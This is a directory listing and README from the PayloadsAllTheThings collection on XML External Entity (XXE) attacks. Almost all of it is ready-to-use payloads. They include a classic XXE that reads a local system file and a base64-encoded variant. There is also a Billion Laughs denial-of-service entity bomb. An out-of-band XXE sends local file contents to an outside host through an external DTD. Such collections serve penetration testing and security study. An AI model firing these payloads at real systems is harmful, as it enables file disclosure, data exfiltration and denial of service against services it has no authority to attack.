PayloadsAllTheThings/XXE files
2016-10-20 10:22:24 +07:00
..
Classic XXE B64 Encoded.xml Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
Classic XXE.xml Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
Deny Of Service - Billion Laugh Attack Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
README.md Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00
XXE OOB Attack (Yunusov, 2013).xml Clean project - Renamed and added PHP juggling type 2016-10-20 10:22:24 +07:00

XML External Entity

An XML External Entity attack is a type of attack against an application that parses XML input

Exploit

Classic XXE

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///sys/power/image_size">
]>
<data>&file;</data>

Classic XXE Base64 encoded

<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>

Deny Of Service - Billion Laugh Attack

<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

XXE OOB Attack (Yunusov, 2013)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>

File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;

Thanks to